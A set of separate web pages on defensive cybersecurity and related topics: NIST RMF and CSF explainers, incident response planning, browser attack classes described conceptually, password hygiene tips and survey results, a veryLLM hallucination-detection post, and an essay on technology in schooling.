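    "controls": {               # baseline chosen in the Select step
        "AC-2": lambda: True,   # account management operating?
        "AU-6": lambda: True,   # audit records being reviewed?
        "CM-6": lambda: False,  # configuration settings enforced?
    },
}

# The Monitor step: re-run the checks continuously and surface failures
# so a risk-based reauthorization decision can be made.
failing = [cid for cid, check in system["controls"].items() if not check()]
print(f"{system['name']}: controls needing attention: {failing}")
```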
What is NIST SP?
NIST's publications are considered authoritative in the field of cybersecurity and are widely used by government agencies, businesses, and individuals to strengthen security postures, protect sensitive information, and ensure compliance with NIST standards. Some of the key NIST publications in the context of cybersecurity include:
NIST Special Publication (NIST SP): These are perhaps the most well-known publications in the field of information security. They cover topics such as risk management, encryption standards, security controls, and guidelines for securing various technologies.
NIST Interagency Reports (IRs): These reports often document research and recommendations for various technical and scientific topics, including cybersecurity.
NIST Federal Information Processing Standards (FIPS): These are specific standards and guidelines that federal agencies are required to follow for securing information and technology systems.
NIST Cybersecurity Framework: This framework provides guidance for organizations to develop and improve their cybersecurity risk management processes.
NIST Computer Security Resource Center (CSRC): The CSRC provides access to a wealth of information, including guidelines, standards, and publications related to computer security.
NIST Cybersecurity Practice Guides: These guides provide practical, step-by-step instructions for implementing various cybersecurity solutions and best practices.
NIST Security Bulletins: These contain alerts, updates, and other information related to current cybersecurity threats and vulnerabilities.
What is RMF vs CSF?
NIST Risk Management Framework (RMF) is primarily aimed at the federal government and its contractors, with a specific focus on managing risks in government information systems in the United States. On the other hand, the NIST Cybersecurity Framework (CSF) is a more general framework that can be used by a wide range of organizations to enhance their overall cybersecurity practices. While there may be some overlap between the two frameworks, they have different scopes and intended audiences. Many organizations may choose to use both frameworks in conjunction to achieve comprehensive cybersecurity and risk management.
NIST Risk Management Framework (RMF)
As stated above, the RMF's target audience is primarily government agencies and contractors that handle sensitive government information.
- The RMF provides a structured process for managing risks throughout the entire system development and operational lifecycle. It emphasizes continuous monitoring and authorization of information systems.
- The RMF also includes the 7 steps for mitigating and monitoring risk.
NIST Cybersecurity Framework (CSF)
NIST Cybersecurity Framework (CSF) is a more general framework designed to help organizations, both public and private, manage and improve their overall cybersecurity posture. It is a voluntary framework that can be adopted by a wide range of entities.
- The CSF is intended for organizations of all types and sizes, including critical infrastructure sectors, businesses, and government agencies.
- The CSF is built around five core functions: Identify, Protect, Detect, Respond, and Recover. These functions help organizations address various aspects of cybersecurity, from risk management to incident response.
- The CSF is highly flexible and can be adapted to an organization’s specific needs and circumstances. It provides guidance on how to assess and improve an organization’s cybersecurity posture. | <urn:uuid:76287d42-4744-4f6d-87d7-82a9d84b79ef> | CC-MAIN-2024-38 | https://www.calcomsoftware.com/nist-risk-management-framework-rmf-explained/ | 2024-09-10T01:50:27Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651164.37/warc/CC-MAIN-20240909233606-20240910023606-00120.warc.gz | en | 0.930844 | 1,098 | 2.765625 | 3 |
What Is the National Institute of Standards and Technology Cybersecurity Framework?
In 2014, the National Institute of Standards and Technology (NIST) developed what is known as the NIST Cybersecurity Framework. The framework helps organizations manage cybersecurity risk, and businesses of all types in the private sector have now adopted it for their own benefit.
Functions of NIST Cybersecurity Framework
Within the NIST Cybersecurity Framework, all actions fall into five main categories:
- Identify: This function is the foundation of the cybersecurity framework. Learn to identify the risks related to operations, assets, and resources and create a risk management strategy.
- Protect: Protection focuses on the procedures you’ll use to prevent attacks and keep critical functions operating. Establishing data protection programs and training staff on security threats are vital in this step.
- Detect: This function involves the actions you take to detect cybersecurity risks. You implement the appropriate measures to ensure that your team or programs can identify events.
- Respond: With this step, you’ll focus on how your team responds to a detected risk. Aspects include following your response plans, event analysis, and developing improvements.
- Recover: These steps are about how to get compromised systems running again. Recovery includes determining how you’ll change your setup to increase security in the future.
Benefits of NIST Risk Management Framework
Implementing the NIST Cybersecurity Framework provides several benefits for your business. It's a plan with clearly defined steps that you can tailor to meet your needs, helping you understand and respond to risks in an organized manner. And the benefit of avoiding costly cybersecurity breaches outweighs the initial cost of implementing the program.
How to Implement NIST Cybersecurity Framework
Before implementing the NIST Framework, you should examine the assets and protections you already have. Determine areas where you need improvement. We suggest starting with the “Identify” foundational step. You can work through the functions above and repeat steps as needed.
You can follow the NIST Cybersecurity Framework Implementation Tiers to make this process simpler. There are a total of four tiers:
- Tier 1 (Partial): Risk management is ad hoc and largely reactive.
- Tier 2 (Risk Informed): Management approves risk management practices, but they may not be established as organization-wide policy.
- Tier 3 (Repeatable): Risk management practices are formally approved and expressed as organization-wide policy.
- Tier 4 (Adaptive): The organization adapts its cybersecurity practices based on lessons learned and predictive indicators.
Frequently Asked Questions About NIST Cybersecurity Framework
Here are some of the most frequently asked questions about the NIST Cybersecurity Framework:
- Is the NIST Cybersecurity Framework a requirement for my organization? The framework is voluntary.
- Who can use the NIST Cybersecurity Framework? Any business in the private or public sector can implement the NIST Framework.
- Should my company use the NIST Framework if we already have a cybersecurity program? You can still implement the framework even if you already have cybersecurity measures.
Enhance Your Cybersecurity Programs
Our team will gladly assist you in implementing the NIST Cybersecurity Framework. Learn about cybersecurity programs from Agio today.
Connect with us.
Need a solution? Want to partner with us? Please complete the fields below to connect with a member of our team. | <urn:uuid:ec5dcd00-a6cb-4e6f-b3a2-55e73ec1ff26> | CC-MAIN-2024-38 | https://agio.com/what-is-nist-cybersecurity-framework/ | 2024-09-17T10:11:58Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651750.27/warc/CC-MAIN-20240917072424-20240917102424-00420.warc.gz | en | 0.91238 | 604 | 2.921875 | 3 |
Lost Data Doesn't Necessarily Lead to Crimes
The year 2005 will likely go down in history as the year of the data security breach. It was a year in which CardSystems Solutions Inc. revealed a security breach that exposed data on potentially more than 40 million payment-card accounts. DSW Shoe Warehouse disclosed the theft of credit-card data on 1.4 million customers. Information brokers LexisNexis and ChoicePoint revealed breaches involving millions of sensitive records. It was also the year of lost data, with UPS, Citigroup, Bank of America, Ameritrade, and Time Warner all reporting losses of backup tapes containing sensitive data.

But beyond all the hoopla, what is the likely economic impact of these and other data breaches? Do some data breaches pose more of a risk than others? What can banks do to prevent and detect identity theft?
Hard numbers are difficult to come by. According to the Federal Trade Commission, some 246,570 identity theft cases were recorded in its Sentinel consumer fraud database in 2004; the FTC defines ID theft broadly as the appropriation of personal information such as a Social Security number or credit card account number to commit fraud or theft.
Others take a finer-grained approach, creating two buckets of identity crime: account fraud (in which a person's account number is stolen and used to commit fraud) and identity theft (in which existing accounts are taken over or new ones created using the victim's Social Security number and other data).
To put some meat on the bare-bones statistics, ID Analytics Inc., an identity-theft risk management company, studied four high-level identity crime cases involving approximately half a million consumer identities. Two of them involved account fraud, and two involved identity theft. The company analyzed transactions for suspicious activity using its proprietary fraud detection technology, Graph Theoretic Anomaly Detection, which sifts data for clues, such as a single Social Security number associated with two or more individuals.
The findings suggest that the fears stirred by identity-type data losses may be overblown. While identity theft poses the greatest threat to consumers, ID Analytics found that the highest rate of misuse of victims' identities was less than one-tenth of one percent of all identities compromised—or less than one in 1,000.
The findings also suggest that the likelihood of criminal misuse is correlated with the type of data breach. Deliberate hacking of a database produced the highest rate of crime, followed by inadvertent access to sensitive data (such as data that is accessed on a stolen laptop). Losses of data, such as tapes falling off a truck, were considered the least likely breaches to result in subsequent crimes.
The findings confirm what can be intuitively grasped about criminal intent: The more targeted and focused the attempt to siphon off personal data, the greater the likelihood it will lead to fraud. While the CardSystems breach resulted in millions of accounts being exposed, the likelihood that more than a tiny fraction will be used to commit crime is quite small. "The smaller the breach the higher the likelihood of misuse," says Mike Cook, co-founder of ID Analytics. "A smaller breach is more worrisome."
One of the factors militating against the criminal use of data is the sheer length of time it takes to commit fraud. It takes about five minutes to fill out a credit application. At that rate, it would take a single thief working 6.5 hours a day, five days a week, 50 weeks a year, over 50 years to create one million phony identities.
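As a quick sanity check on that arithmetic, a few lines of Python (illustrative only) reproduce the figure:

```python
# Back-of-the-envelope check of the "over 50 years" figure.
minutes_per_application = 5
hours_per_day = 6.5
days_per_week = 5
weeks_per_year = 50

applications_per_year = (hours_per_day * 60 / minutes_per_application) * days_per_week * weeks_per_year
years_for_a_million = 1_000_000 / applications_per_year

print(round(applications_per_year))   # 19500 applications per year
print(round(years_for_a_million, 1))  # ~51.3 years
```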
That's no cause for rejoicing, however; once a victim's identity has been stolen, the thief can sit on it for a while, then spring it to life after the heat's died down. For this reason, "any company has to perform due diligence on lost data" for a long time after the breach has occurred, says Cook. "Someone can slowly milk identities and after 15 months have an uptick in a use," he says. "It's important for all companies that have a breach to use technology to determine who's been harmed."
Andrew Miller is a freelance writer specializing in financial services and information technology. He holds an MBA from Columbia University and a Master's in computer science from Rensselaer Polytechnic Institute. He has held jobs at CMP Media, MetLife, and Gartner. | <urn:uuid:23c2116c-1395-424b-b3df-c3471292ef5a> | CC-MAIN-2024-38 | https://www.bankinfosecurity.com/lost-data-doesnt-necessarily-lead-to-crimes-a-108 | 2024-09-07T16:50:44Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700650898.24/warc/CC-MAIN-20240907162417-20240907192417-00420.warc.gz | en | 0.952564 | 890 | 2.578125 | 3 |
InfoSec professionals are building systems and adopting tools to help safeguard against ransomware, malware, and phishing attacks. Firms are also building incident response plans on the assumption that an incident will occur, so that the plan can guide them out of danger.
Incident response definition
An incident response plan documents how an organization will respond to a cyberattack or a data breach. It aims to reduce the potential damage of a breach.
Incident response is the approach an organization uses to address and manage a data breach or cyberattack, also called an IT incident, computer incident, or security incident. It helps reduce recovery time and cost by limiting the damage.
How to create an incident response plan
An incident response plan can help you contain damage in time and improve future security efforts. Here is how an incident response plan should be prepared.
Assign clear responsibilities
Start the incident response plan by assigning roles: decide who will oversee the development of the plan, gather input, and assign responsibilities accordingly. Select who will serve on the security incident response team (SIRT). The team will be responsible for detection, classification, notification, analysis, containment, eradication, documentation, and post-incident activity.
Define your risk tolerance
After assigning tasks, you need to define your risk tolerance. Identify your critical data and the key functionality the company requires, and then prioritize your efforts. Seek the help of stakeholders when identifying the risks.
Classify and document incidents
The third step, after defining roles and risks, is incident classification. Develop an incident classification scheme so that you know what action to take for each type of event. Classified incidents are easier to prioritize, and documented incidents also help during audits and investigations.
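As a rough illustration of what a classification scheme can look like in practice, here is a minimal Python sketch; the categories and severity thresholds are assumptions and would need to be tuned to your own risk tolerance:

```python
from dataclasses import dataclass
from enum import Enum

class Severity(Enum):
    LOW = 1
    MEDIUM = 2
    HIGH = 3
    CRITICAL = 4

@dataclass
class Incident:
    title: str
    category: str            # e.g. "phishing", "malware", "data breach"
    affects_critical_data: bool
    systems_affected: int

def classify(incident: Incident) -> Severity:
    """Map an incident to a severity level so the SIRT can prioritize it."""
    if incident.affects_critical_data:
        return Severity.CRITICAL
    if incident.systems_affected > 10:
        return Severity.HIGH
    if incident.systems_affected > 1:
        return Severity.MEDIUM
    return Severity.LOW

print(classify(Incident("Phishing email reported", "phishing", False, 1)))  # Severity.LOW
```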
Set explicit instructions
After classifying the incidents, you can assign a role to each person and clarify their duties. The plan should include everything from fixed time scales for an investigation to the steps needed to remediate problems. This helps avoid bad decisions made under pressure.
It should also specify what actions the SIRT must take when an incident is uncovered. The SIRT will be responsible for investigating and analyzing the potential scope. Do not delete any data during the investigation.
Prioritize eradication and recovery
The critical data that enables your business should be fully backed up. For effective eradication and recovery, you need to perform triage. Finally, it is vital to learn from each incident so you can avoid similar mistakes in the future.
Web security can be divided into two parts, Website security and Web Browser security. Both are equally important. A website must be able to protect itself from a hostile browser and a browser must be able to protect itself from a hostile website. If either side of these assumptions fails, then there is a problem (the Web is not secure). Attacks targeting browsers, which will be the focus of this post, can be broadly categorized into three distinct vectors:
1) Attacks designed to escape the confines of the browser walls and execute within the desktop operating system below. This is primarily achieved by exploiting memory and file-handling implementation flaws.
2) Behavioral attacks that trick users into doing something, such as downloading and installing malware, thereby harming their machine or encouraging them to reveal sensitive information.
3) Attacks taking advantage of design flaws in the way the Web works. These attacks normally remain within the browser walls and use the victim’s browser as a launch platform for surreptitiously pilfering information from their session or the surrounding network.
After years of massive volumes of CVEs (publicly catalogued vulnerability reports), the browser vendor incumbents (Microsoft, Mozilla, Opera, Google, Apple) have made great strides in addressing vector #1. Some have more work to do than others. This is a good thing, as exploiting unpatched browsers is the primary method for malware propagation such as the so-called drive-by-downloads, legitimate websites hosting malware that infects their visitors. Fortunately “fixing” #1 doesn’t require “breaking the Web,” only updating shoddy code and distributing updates.
Solving #2 is more psychological than technical in nature. The challenge is that people trust computer screens, believe what they see on the Web, and will install anything in order to watch the latest celebrity sex tape or open a personalized e-greeting sent by their “friend.” Attackers prey on this inherent trust, general good nature, and basic human instinct. In response, browsers have provided EV-SSL, Anti-Phishing Toolbars, SSL warning dialogs, password managers, etc. These efforts make important security decisions more visible, harder to get wrong, or remove the decision altogether. Again “fixing” these issues doesn’t require “breaking the Web,” but creating a more intuitive user-interface design.
Addressing #3, with roots dating back to the earliest days of the Web, is another matter entirely. Cross-Site Scripting (XSS), Cross-Site Request Forgery (CSRF), Clickjacking, CSS History Stealing, Intranet Hacking, etc. are all good examples. While these weren’t pressing issue before, they are trending in a dangerous direction. We’ve seen outbreaks of Twitter worms, XSS Defacements of government websites, Facebook Clickjacking attacks, sites that disclose which porn sites people visit, several Intranet Hacking proof-of-concept tools, and so on.
Many, including myself, have asked the major browser vendors to do something about CSS history hacking (a privacy violation where a malicious website can tell if you’ve been to a certain URL) by disabling access to key DOM APIs. They said doing so would break certain websites and upset Web developers. (Update: See Wladimir's comment below for excellent insight into the true difficulty of solving this problem)
To solve Intranet Hacking, the suggestion was made to deny websites with a non-RFC 1918 IP address the ability to passively instruct a browser to connect to RFC 1918 IP addresses. The response was that it would break certain essential features like corporate Web proxy set-ups and add-ons like Google Desktop.
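For illustration, the RFC 1918 check itself is simple; a browser could, in principle, apply a test like this Python sketch before letting a public page trigger requests to internal addresses:

```python
import ipaddress

RFC1918_NETWORKS = [
    ipaddress.ip_network(n)
    for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")
]

def is_rfc1918(ip: str) -> bool:
    """True if the address falls in one of the private RFC 1918 ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in RFC1918_NETWORKS)

print(is_rfc1918("192.168.1.10"))   # True: internal address
print(is_rfc1918("93.184.216.34"))  # False: public address
```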
Fixing Clickjacking would require changing IFRAMES implementation so that they would not be transparent or allowed at all. Doing so would undoubtedly cause major Web breakage, such as no banner advertising or Facebook-style application platforms. So instead we get opt-in X-FRAME-OPTIONS, which basically no one uses at the moment.
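For sites that do want to opt in, the header is easy to emit. A minimal sketch, assuming a Python Flask application, might look like this:

```python
from flask import Flask

app = Flask(__name__)

@app.after_request
def forbid_framing(response):
    # Refuse to be rendered inside any frame, which defeats basic Clickjacking.
    # "SAMEORIGIN" is the looser alternative that still allows same-site frames.
    response.headers["X-Frame-Options"] = "DENY"
    return response

@app.route("/")
def index():
    return "This page cannot be framed."
```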
Maybe browser tab/session separation is in order. When logged-in to a website in one tab, other tabs wouldn’t have session access thereby limiting the damage XSS, CSRF, and Clickjacking could inflict. But, this solution would probably annoy users and Web developers who really want persistent authentication. Oh, and we really need Web tracking cookies too. Gah!
So here we are, waiting for the other shoe to drop, and bad enough things to happen. Then we’ll get the juice required to fix these problems, by default. The bigger problem is when that time eventually comes we might actually be forced to break the Web to secure it. In the meantime, the community has been lobbying hard for opt-in tools that the proactive crowd can use to protect themselves ahead of time. Fortunately, we are starting to see new technologies like XSSFilter, Content Security Policy, Strict Transport Security, and Origin headers come into view. Maybe this is the future and a look into the security proving ground for the changes we’ll need to make later. | <urn:uuid:ec12a7f6-0526-428e-8410-adfcc0c1df0e> | CC-MAIN-2024-38 | https://blog.jeremiahgrossman.com/2010/02/web-wont-be-safe-let-alone-secure.html?showComment=1265236514359 | 2024-09-10T05:00:25Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00220.warc.gz | en | 0.929604 | 1,068 | 3.015625 | 3 |
Password security is a critical aspect of cyber security. A strong password can protect your personal and sensitive information from being accessed by unauthorised users and reduce the risk of your accounts being compromised.
Unfortunately, we make it all too easy for hackers by using simple, easy-to-guess passwords. “123456” is still the most commonly used password in the world and provides no protection whatsoever should a hacker target a device.
This approach to password security is very risky and leaves many people vulnerable to being hacked. Hackers have a range of tools at their disposal, but the easiest and most frequently used method to gain access to an account is to guess passwords.
Sophisticated hackers even use specialist software that can test thousands of possible username and password combinations per second, demonstrating the sheer brute force behind these attacks. 60% of people use the same username and password credentials for all their accounts, so if hackers are able to gain access to one account, they have free rein to break into them all.
As soon as hackers gain access to this personal information, they can use it to commit identity fraud, sell on to criminal third parties or simply clear out bank accounts and never be seen again.
Creating a strong password is crucial in protecting our online identity and ensuring that we don’t become easy targets for hackers. Here are 5 top tips to improve password security.
Top Tips to Improve Password Security
1. Create Unique Passwords
The secret to creating a unique and secure password is to make it memorable but difficult to crack. A strong password should be between 12 and 20 characters long, contain a mix of upper and lowercase letters, and include numbers or symbols.
To make it even more secure, you can build it from a passphrase that is unique to you. Think of a memorable phrase, take the first letter of each word to form the basis of your password (aim for around 15 characters), and substitute some letters with numbers and symbols for further protection.
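To make the technique concrete, here is a small illustrative Python sketch that turns a phrase's initials into a password with simple substitutions; in practice, a password manager's built-in generator is a stronger choice:

```python
# Illustrative only: takes each word's first character and substitutes
# a few letters with numbers and symbols.
SUBSTITUTIONS = {"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"}

def password_from_phrase(phrase: str) -> str:
    initials = [word[0] for word in phrase.split()]
    return "".join(SUBSTITUTIONS.get(ch.lower(), ch) for ch in initials)

phrase = "My Dog Barks At Every Single Postman On Our Street 2 Times!"
print(password_from_phrase(phrase))  # MDB@3$P00$2T
```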
2. Use Different Passwords for Different Accounts
With so many different online accounts, it can be tempting to use the same password for multiple accounts to gain quick and easy access. However, this is extremely risky and if attackers can work out just one of your passwords, whether it’s a Facebook account or your online banking details, they can potentially access every single account you have. It’s always best to use different passwords for different accounts to ensure your data remains safe and secure.
3. Consider the use of a Password Manager
It can be a daunting task trying to remember lots of different, complex passwords, but a password manager provides a centralised, encrypted vault that keeps all of these passwords safe.
Password managers, such as LastPass, store login details for all the websites that you use and log you in automatically each time you return to a site. The first step when using a password manager is to create a master password, which controls access to your entire password database. This is the only password you will have to remember, so it’s important to make it as strong and secure as possible.
Password managers can also protect against phishing and social engineering attacks as they fill in account information based on registered web addresses. If you think you’re on your bank’s website but the password manager doesn’t automatically log you in, there’s a good chance that you’ve strayed onto a phishing site.
4. Update passwords
To ensure that your online accounts remain safe and secure, it’s best to update your password on a regular basis. If you continue to use the same password year after year on multiple accounts, it greatly increases the chance of your accounts being hacked.
Entire passwords can be changed, or elements of each password can be changed to make it easier for you to remember but harder to crack. Rather than change your full password, you can change characters, add numbers or symbols, or swap uppercase and lowercase letters.
If one of your accounts has been compromised, you should immediately create a new password on the affected service and any others that use the same or similar password.
5. Two-Factor Authentication
Two-factor authentication offers an extra layer of defence in protecting the security of your accounts. There are a range of different two-factor authentication apps and services available for this process.
Once you have registered, you can log in into your accounts as normal and enter your password. As soon as you do this, the two-factor authentication site will send a one-off code to your phone that you must enter before gaining access to your account. This reduces the chance of a hacker being able to gain easy access to your accounts and improves your password security.
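Under the hood, most authenticator apps implement time-based one-time passwords (TOTP). A minimal sketch using the third-party pyotp library (an assumption; any TOTP implementation works the same way) shows the idea:

```python
import pyotp

# The shared secret is established once, when you enroll your device.
secret = pyotp.random_base32()
totp = pyotp.TOTP(secret)

code = totp.now()          # six-digit code that changes every 30 seconds
print(code)
print(totp.verify(code))   # True: the server runs the same check at login
```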
MetaCompliance specialises in creating the best Cyber Security awareness training available on the market. Our products directly address the specific challenges that arise from cyber threats and corporate governance by making it easier for users to engage in Cyber Security and compliance. Get in touch for further information on how we can help transform Cyber Security training within your organisation. | <urn:uuid:9af12e8e-4514-449d-a0da-6611813d0e16> | CC-MAIN-2024-38 | https://www.metacompliance.com/blog/security-awareness-training/top-5-tips-to-improve-password-security | 2024-09-10T03:33:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651196.36/warc/CC-MAIN-20240910025651-20240910055651-00220.warc.gz | en | 0.9244 | 1,043 | 2.8125 | 3 |
In the world of artificial intelligence, large language models (LLMs) have become indispensable tools for a wide range of applications. However, with their immense power comes a significant challenge: the potential for hallucinations and inaccuracies in their outputs. Enter veryLLM, a new open-source initiative created by Vianai, dedicated to identifying and rectifying inaccuracies in the generated outputs of LLM models. In this blog post, we will dive deep into the world of veryLLM, exploring its components, inner workings, and the collaborative efforts it encourages to ensure the trustworthiness of language models.
What is veryLLM?
veryLLM is a framework crafted to address the critical challenge of improving the reliability of large language models. Developed by Vianai, a leading name in AI research and development, veryLLM seamlessly complements Vianai's Hila Enterprise product, contributing to advancements in the AI field.
At the heart of veryLLM are several crucial components designed to support the challenge of solving the issue of hallucinations in LLMs:
1. Hallucination Dataset:
The VeryLLM project offers a distinctive hallucination dataset that originates from the TruthfulQA dataset (https://github.com/sylinrl/TruthfulQA) but has been meticulously modified and expanded to focus on hallucinations rather than truths. This expansion is crucial because hallucinations often stem from interpolated dataset-truths that either are out-of-context for a given question or not widely understood as global-truths. This dataset has undergone rigorous manual evaluation by multiple team members, and we actively encourage our community to participate in critiquing and further expanding it.
2. Truthful Function Framework:
Within veryLLM, we introduce an approach to hallucination detection through "truthful functions" (is_true() functions). These functions play a critical role in assessing the veracity of language model responses by considering the question posed to the LLM, the generated response, and the relevant contextual information used by the LLM in generating that response. Is_true() functions are designed to be modular and work alongside LLMs, providing support for existing and future language models.
This framework simplifies the process of creating these functions, making it accessible to data scientists and developers alike. Additionally, it offers an automated testing and upload pipeline, allowing creators to effortlessly benchmark their functions against others and potentially earn a coveted place on the leaderboard. This collaborative environment promotes the development of the most reliable functions for the benefit of the entire community.
3. GUI Playground:
veryLLM offers a user-friendly GUI playground that serves as a valuable sandbox for researchers and data scientists to experiment with various is_true() functions. What distinguishes this playground is its integration of an ensemble of top-performing functions from the leaderboard, ensuring rigorous verification.
While it's important to note that the frontend UI of veryLLM is not currently open-sourced, it is public and freely accessible for developers. This transparency allows developers to explore and understand the functionalities veryLLM offers, providing insights for potential integration into their own language model applications. Developers may also directly interact with veryLLM APIs from Jupyter notebooks and Python scripts to evaluate the performance of these is_true() functions.
""At the heart of veryLLM are several crucial components designed to support the challenge of solving the issue of hallucinations in LLMs."
veryLLM's is_true() functions are designed to classify statements into three distinct categories:
1. Verified: Statements in this category are substantiated by specific contextual information from Wikipedia. Users are provided with sources to corroborate the information. Additionally, users can view additional information, like the results of all is_true() functions used to evaluate the statement with the specific context paragraph considered.
2. Not Verified: In some cases, even with the most pertinent context available, a statement cannot be definitively confirmed as true. This category reflects such instances. It's important to note that this category does not ensure that the statement is false; rather, the statement is likely unsubstantiated given the reference context. veryLLM operates as a truth detector, not a lie detector.
3. Unable to Verify: This classification indicates a lack of relevant information within the subset of Wikipedia articles utilized as context. It signifies the need for additional context to assess the veracity of the statement effectively.
Important to highlight is that veryLLM's current context pool comprises a subset of Wikipedia articles. Instead of reprocessing vast amounts of data, veryLLM taps into Cohere's extensive collection of 1 million+ embedded Wikipedia articles at the paragraph level (https://txt.cohere.com/embedding-archives-wikipedia/), made accessible via Weaviate's publicly accessible vector database instance (https://weaviate.io/?ref=txt.cohere.com). Given that most publicly disclosed LLM training datasets include Wikipedia, this approach provides a robust foundation for veryLLM's verification process.
Furthermore, veryLLM intends to expand its contextual resources by processing paragraph-level embeddings of other commonly used datasets in the training of LLMs for datasets like C4 / Common Crawl (https://commoncrawl.org/) and others. This expansion will enable the verification of claims from a wider range of topics. This is a call to our community to actively participate in helping us map and process the training datasets of all widely used LLMs, fostering a collaborative environment that enhances the trustworthiness of AI systems.
Developers working with language models can easily integrate veryLLM's APIs to verify the accuracy of LLM responses. Whether they want to test their own is_true() functions or simply integrate the best LLM output verification, the straightforward API allows them to achieve this with just a few lines of code, providing access to comprehensive verification details for each sentence generated by the LLM.
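The exact endpoints and field names belong to the veryLLM project itself, so treat the following Python sketch as a hypothetical illustration of the shape of a truthful function rather than the real API; a naive word-overlap scorer stands in here for a production is_true() implementation:

```python
import string

def _tokens(text: str) -> set:
    return {w.strip(string.punctuation).lower() for w in text.split()}

def naive_is_true(question: str, response: str, context: str) -> float:
    """Toy truthful function: fraction of the response's words that also
    appear in the reference context (0.0 = unsupported, 1.0 = fully covered).
    A production is_true() function would also use the question and far
    more robust techniques than word overlap."""
    response_words = _tokens(response)
    if not response_words:
        return 0.0
    return len(response_words & _tokens(context)) / len(response_words)

score = naive_is_true(
    question="Where was Marie Curie born?",
    response="Marie Curie was born in Warsaw.",
    context="Marie Curie was born in Warsaw, in what was then the Kingdom of Poland.",
)
print(round(score, 2))  # 1.0: every response token appears in the context
```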
Getting Started with veryLLM
For those interested to join the effort, check out these resources:
– veryLLM GitHub Repository – https://github.com/vianai-oss/veryLLM
– veryLLM Playground – https://www.veryllm.ai/
These links are your gateway to exploring veryLLM, contributing to its development, and making a positive impact on the reliability of language models.
In the ever-evolving field of AI, the importance of reliable language models cannot be overstated. veryLLM offers a robust framework for identifying and addressing hallucinations in these models. It reflects Vianai's dedication to enhancing the trustworthiness of language models and welcomes the broader AI community to join us in this effort. With veryLLM, we are advancing towards a future where AI-generated content is not just powerful but also unquestionably reliable.
Our Approach, Our Products
Since its inception, Vianai's mission has been to bring human-centered and responsible AI to enterprises worldwide. H+AI™ is the philosophy that underpins all of the work we do at Vianai, the products we build, and how we work with customers.
BOSTON, November 1, 2022 -- LastPass today released findings from its fifth annual Psychology of Passwords report, which revealed that even with cybersecurity education on the rise, password hygiene has not improved. Regardless of generational differences across Boomers, Millennials and Gen Z, the research shows a false sense of password security given current behaviors across the board. In addition, LastPass found that while 65% of all respondents have some form of cybersecurity education – through school, work, social media, books or courses via Coursera or edX – the reality is that 62% almost always or mostly use the same password or a variation of it.
The goal of the LastPass Psychology of Passwords research is to showcase how password management education and use can secure users' online life, transforming unpredictable behavior into real and secure password competence. The survey, which explored the password security behaviors of 3,750 professionals across seven countries, asked about respondents’ mindset and behaviors surrounding their online security. The findings highlighted a clear disconnect between high confidence when it comes to their password management and their unsafe actions. While the majority of professionals surveyed claimed to be confident in their current password management, this doesn’t translate to safer online behavior and can create a detrimental false sense of safety.
Key findings from the research include:
- Gen Z is confident when it comes to their password management, while also being the biggest offenders of poor password hygiene. As the generation who has lived most of their lives online, Gen Z (1997 – 2012) believes their password methods to be “very safe.” They are the most likely to create stronger passwords for social media and entertainment accounts, compared to other generations.
However, Gen Z is also more likely to recognize that using the same or similar password for multiple logins is a risk, but they use a variation of a single password 69% of the time, alongside Millennials (1981–1996) who do this 66% of the time. On the other hand, Gen Z is the generation most likely to use memorization to keep track of their passwords, at 51%, with Boomers (1946–1964) the least likely to memorize their passwords, at 38%.
- Cybersecurity education doesn’t necessarily translate to action. With 65% of those surveyed claiming to have some type of cybersecurity education, the majority (79%) found their education to be effective, whether formal or informal. But of those who received cybersecurity education, only 31% stopped reusing passwords. And only 25% started using a password manager.
- Confidence creates a false sense of password security. While 89% of respondents acknowledged that using the same password or variation is a risk, only 12% use different passwords for different accounts, and 62% always or mostly use the same password or a variation. To add to that, compared to last year, people are now increasingly using variations of the same password, with 41% in 2022 vs. 36% in 2021.
“Our latest research showcases that even in the face of a pandemic, where we spent more time online amid rising cyberattacks, there continues to be a disconnect for people when it comes to protecting their digital lives,” said Christofer Hoff, Chief Secure Technology Officer for LastPass. “The reality is that even though nearly two-thirds of respondents have some form of cybersecurity education, it is not being put into practice for varying reasons. For both consumers and businesses, a password manager is a simple step to keep your accounts safe and secure.”
For more information and to download the full Psychology of Passwords research findings, please click here.
LastPass commissioned the market research firm Lab42 to reveal the current state of password behaviors in the new era of remote work. The responses were generated from a survey of 3,750 professionals at organizations across a variety of industries in the United States, United Kingdom, Germany, Australia, Singapore, and Brazil. The survey asked the professionals surveyed about their feelings and behaviors regarding online security. The result? An increase in time spent online with continued poor password behavior and cognitive dissonance.
LastPass is an award-winning password manager which has helped more than 33 million registered users organize and protect their online lives. For more than 100,000 businesses of all sizes, LastPass provides password and identity management solutions that are convenient, easy to manage and effortless to use. From enterprise password management and single sign-on to adaptive multi-factor authentication, LastPass for Business gives superior control to IT and frictionless access to users. For more information, visit https://www.lastpass.com. LastPass is trademarked in the U.S. and other countries. | <urn:uuid:3c9ffe9f-6901-4a30-8fe8-e92c53eb528c> | CC-MAIN-2024-38 | https://www.lastpass.com/company/newsroom/press-release/lastpass-research-finds-false-sense-of-cybersecurity-running-rampant | 2024-09-13T17:35:28Z | s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651535.66/warc/CC-MAIN-20240913165920-20240913195920-00820.warc.gz | en | 0.944469 | 946 | 2.703125 | 3 |
The first full school year of remote, in-person, or hybrid model of instruction during the COVID-19 era is finally behind us. Now that the dust is settling on that tumultuous time for students, teachers, parents, and administrators, we need to reflect and dissect the cases of perseverance and success and how they came about so that we can be ready to grapple with the challenges that we will surely meet going forward. Indeed, there are many lessons to be learned from the past year, but possibly the most critical is the need for school systems in every community to have a plan to deliver technology-enabled instruction to students.
Leveraging technology to improve student outcomes is not a new concept but it is a practice typically done in isolation and at the maximum comfort level of the teacher. Many instructors to this day reject the full capabilities of what advanced technologies can provide in favor of a twentieth-century model of manual computing and labor because that is “how it has always been done.” In reality, new and innovative technologies, coupled with the ability to digitize and deliver content remotely, has expanded the capabilities of teachers to personalize instruction based upon a student’s interest, learning style, aptitude, and countless other factors because no two kids are the same. In essence, the traditional paradigm has been flipped from “students go to school to learn” to “learning goes to students wherever they are.”
